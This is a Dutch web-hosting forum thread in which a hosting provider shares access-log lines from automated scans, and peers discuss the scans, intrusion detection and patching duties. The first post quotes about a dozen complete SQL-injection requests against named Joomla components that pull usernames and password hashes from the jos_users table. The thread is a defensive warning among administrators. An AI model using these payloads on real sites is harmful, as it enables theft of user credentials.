Likes Likes:  0
Resultaten 1 tot 8 van de 8

Onderwerp: Joomla exploit runs

  1. #1
    Joomla exploit runs
    geregistreerd gebruiker
    543 Berichten
    Ingeschreven
    06/10/06

    Locatie
    Zuidhorn

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    3 Berichten zijn liked


    Naam: Rudy
    Bedrijf: Brinkman IT
    Functie: Directeur/eigenaar
    URL: www.brinkhost.nl
    KvK nummer: 02069024
    Ondernemingsnummer: nvt
    View brinkman.it's profile on LinkedIn

    Thread Starter

    Angry Joomla exploit runs

    Ik zag bij het doorspitten van de statistieken van m'n sites (ach, ieder z'n hobby ;-)) dat er vanochtend tussen 10:30 - 11:30 op één van m'n servers opvallend veel hits waren, en ook minutenlang waarbij één van de sessies zelfs bijna 17 minuten duurde, vanaf diverse andere hostingbedrijven waaronder een aantal Nederlandse.

    Al die hits waren duidelijk verdacht. Zogenaamd allemaal met Windows XP machines en gebruikmakend van MSIE 6.0 als browser. Nader onderzoek van de logfiles leerde me dat men vanaf verschillende locaties op zoek was naar lekke Joomla-installaties (componenten) en probeerde die te kraken danwel infecteren.

    Voorbeeld uit de logs:

    Code:
    212.227.119.132 - - [13/Jun/2010:11:03:42 +0200] "GET /?option=com_quran&action=viewayat&surano=-69/**/UNION/**/SELECT/**/1,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),3,4,5/**/FROM/**/jos_users-- HTTP/1.1" 200 14843 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
    70.32.112.133 - - [13/Jun/2010:11:03:54 +0200] "GET /?option=com_bfquiztrial&view=bfquiztrial&catid=34+AND+1=2+UNION+SELECT+1,2,3,4,5,6,7,8,9,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),11,12,13,14,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),97,98,99,100+from+jos_users+LIMIT+0,1-- HTTP/1.1" 200 14843 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
    187.45.193.159 - - [13/Jun/2010:11:04:06 +0200] "GET /?option=com_jepoll&view=poll_graph&task=pollgraph&pollid=-9999+union+all+select+1,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),3,4,5,6,7+from+jos_users-- HTTP/1.1" 200 14843 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
    87.233.188.38 - - [13/Jun/2010:11:04:16 +0200] "GET /?option=com_jejob&view=item&catid=-9999+union+all+select+1,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),3,4,5+from+jos_users-- HTTP/1.1" 200 14843 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
    212.227.119.132 - - [13/Jun/2010:11:05:02 +0200] "GET /?option=com_crowdsource&view=design&cid=-3+uNIOn+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+jos_users-- HTTP/1.1" 200 14843 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
    216.246.99.64 - - [13/Jun/2010:11:05:13 +0200] "GET /?option=com_event&task=details&sid=-61 union select 1,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),3,4,5,6,7,8,9,10 from jos_users-- HTTP/1.1" 200 14814 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
    61.19.251.143 - - [13/Jun/2010:11:05:14 +0200] "GET /?option=com_crowdsource&view=design&cid=-3+uNIOn+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+jos_users-- HTTP/1.1" 200 14843 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
    85.10.207.188 - - [13/Jun/2010:11:05:21 +0200] "GET /?option=com_konsultasi&act=detail&sid=-5/**/union/**/select/**/all/**/1,2,3,4,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),6,7,8,9/**/from/**/jos_users-- HTTP/1.1" 200 14843 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
    212.227.29.143 - - [13/Jun/2010:11:05:32 +0200] "GET /?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users-- HTTP/1.1" 200 14843 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
    212.227.29.143 - - [13/Jun/2010:11:05:40 +0200] "GET /?option=com_abc&view=abc&letter=AS&sectionid=-null+union+select+1,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26)+from+jos_users-- HTTP/1.1" 200 14843 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
    88.198.69.8 - - [13/Jun/2010:11:05:45 +0200] "GET /?option=com_joomradio&page=show_video&id=-13+union+select+1,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),3,4,5,6,7+from+jos_users-- HTTP/1.1" 200 14843 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
    (enzovoorts)

    Ik heb het allemaal niet heel diepgaand geanalyseerd, maar het lijkt mij dat er een poging wordt, werd, gedaan om vanaf besmette sites/hosts andere(n) te besmetten.

    Eén van de hosters was een Duitse host (kundenserver.de, vanaf diverse servers) waar ik in het verleden al vaker last van heb gehad (onder andere doordat hij een ip-adres van één van m'n servers gekaapt had).

    Nederlandse servers die in de logs voorkomen:

    server67.icehosting.nl
    bronco.eatserver.nl
    server1.correcthosting.nl

    En verder nog een serie .com en .uk domeinen.

    De Nederlandse hosts heb ik op de hoogte gesteld maar het leek mij geen verkeerd idee deze informatie ook hier door te geven. Een gewaarschuwd mens..

    Oh ps, omdat men de aanvallen op allerlei domeinen uitprobeert waar niet eens Joomla-sites op staan vielen ze dus al snel door de mand. Verder heb ik de Joomla-installs op de server uiteraard gelijk gecheckt en gelukkig niets mis mee en allemaal redelijk up-to-date.
    Brinkman.IT - Hosting & Design - https://www.brinkhost.nl/

  2. #2
    Joomla exploit runs
    geregistreerd gebruiker
    941 Berichten
    Ingeschreven
    08/08/06

    Locatie
    Doetinchem

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    17 Berichten zijn liked


    Registrar SIDN: Ja
    KvK nummer: 09129344
    Ondernemingsnummer: nvt

    Dit zie ik al 10 jaar op alle servers voorbij komen, dus wat precies het idee is weet ik niet :P Maar het lijkt tevens ook weer vanuit lekke Joomla's te komen. Soort worm dus.

  3. #3
    Joomla exploit runs
    geregistreerd gebruiker
    4.149 Berichten
    Ingeschreven
    09/12/05

    Locatie
    Almere

    Post Thanks / Like
    Mentioned
    10 Post(s)
    Tagged
    0 Thread(s)
    76 Berichten zijn liked


    Naam: Ramon Fincken
    Bedrijf: Managed WordPress Hosting / Codert.cloud
    Functie: CEO
    URL: www.managedwphosting.nl
    Registrar SIDN: Nee
    KvK nummer: 30262182
    TrustCloud: ramonfincken
    View ramonfincken's profile on LinkedIn

    Inderdaad, maar wel opvallend dat het dan nu ineens opvalt. Je moet inderdaad niet schrikken van wat er te zien is in je acces en error logs.
    WordPress hosting Optimalisatie webbouw debugging door WP Core developers

  4. #4
    Joomla exploit runs
    moderator
    6.028 Berichten
    Ingeschreven
    21/05/03

    Locatie
    NPT - BELGIUM

    Post Thanks / Like
    Mentioned
    39 Post(s)
    Tagged
    0 Thread(s)
    481 Berichten zijn liked


    Naam: Dennis de Houx
    Bedrijf: All In One
    Functie: Zaakvoerder
    URL: www.all-in-one.be
    Ondernemingsnummer: 0867670047

    Zie dat ook soms wel eens passeren in de log files, net zoals wordpress exploits en iis exploits op een apache server. Wat je eventueel zou kunnen doen is een IDS/IPS zoals snort draaien, maar dan kan het wel zijn dat je klanten zagen omdat hun site niet meer werkt. Snort is nogal gevoelig als het om oudere versies van cms'es etc aankomt (en met een reden).
    Dennis de Houx - All In One ~ Official ISPsystem partner

    Lees hier de webhostingtalk.nl forum regels en voorwaarden!

  5. #5
    Joomla exploit runs
    geregistreerd gebruiker
    543 Berichten
    Ingeschreven
    06/10/06

    Locatie
    Zuidhorn

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    3 Berichten zijn liked


    Naam: Rudy
    Bedrijf: Brinkman IT
    Functie: Directeur/eigenaar
    URL: www.brinkhost.nl
    KvK nummer: 02069024
    Ondernemingsnummer: nvt
    View brinkman.it's profile on LinkedIn

    Thread Starter
    Citaat Oorspronkelijk geplaatst door Ramon Fincken Bekijk Berichten
    Inderdaad, maar wel opvallend dat het dan nu ineens opvalt. Je moet inderdaad niet schrikken van wat er te zien is in je acces en error logs.
    Het valt nu "opeens" op omdat deze eerder niet voorgekomen is bij mij, in de 10 jaar dat ik een hostingbedrijf heb. Op m'n andere servers kwam het ook niet voor. Slechts op één server.

    Als dat kennelijk zo veelvoorkomend is, waarom hoor je er dan zo weinig over? En, als je het ziet, doe je er niets aan (collega's waarschuwen)?
    Brinkman.IT - Hosting & Design - https://www.brinkhost.nl/



  6. #6
    Joomla exploit runs
    Me, Myself and I
    969 Berichten
    Ingeschreven
    03/07/04

    Locatie
    Limburg

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    20 Berichten zijn liked


    Naam: Pascal
    Functie: Allround System Engineer

    Citaat Oorspronkelijk geplaatst door brinkie Bekijk Berichten
    Als dat kennelijk zo veelvoorkomend is, waarom hoor je er dan zo weinig over? En, als je het ziet, doe je er niets aan (collega's waarschuwen)?
    Collega's waarschuwen heeft - voor mijn gevoel - over het algemeen weinig zin. Ik heb iig nog nooit een response gekregen op een melding richting het abuse adres.

  7. #7
    Joomla exploit runs
    geregistreerd gebruiker
    702 Berichten
    Ingeschreven
    28/09/05

    Locatie
    Utrecht, Nederland

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    4 Berichten zijn liked


    Naam: Frank Wageman
    Functie: Senior System Administrator
    View nl.linkedin.com/in/frankwageman's profile on LinkedIn

    Het is een algemeen feit dat oude Joomla installaties meestal lek zijn en dat er wereldwijd botnetwerken actief zijn deze te doorbreken.. Is dus al zo algemeen dat we de meldingen niet meer serieus nemen. Is de klant zijn eigen verantwoordelijkheid hun installatie up-to-date te houden. Doen ze dat niet dan kunnen we gaan rekenen voor het schoonmaken..

  8. #8
    Joomla exploit runs
    <?php phpinfo(); ?>
    764 Berichten
    Ingeschreven
    10/05/06

    Locatie
    Sevenum

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: nee
    KvK nummer: 12037834
    Ondernemingsnummer: nvt

    Precies, wij vertellen alle klanten die gebruik willen maken van Joomla dat zij zelf verantwoordelijk zijn voor het up-to-date te houden. Indien er spamruns o.i.d. wordt getracht te versturen schakelen wij het account uit.

    Echter ook Joomla installaties met de laatste versie bevatten nog steeds lekken. We adviseren ook altijd om zoveel mogelijk modules die niet gebruikt worden te verwijderen/deactiveren.

Labels voor dit Bericht

Webhostingtalk.nl

Contact

  • Rokin 113-115
  • 1012 KP, Amsterdam
  • Nederland
  • Contact
© Copyright 2001-2021 Webhostingtalk.nl.
Web Statistics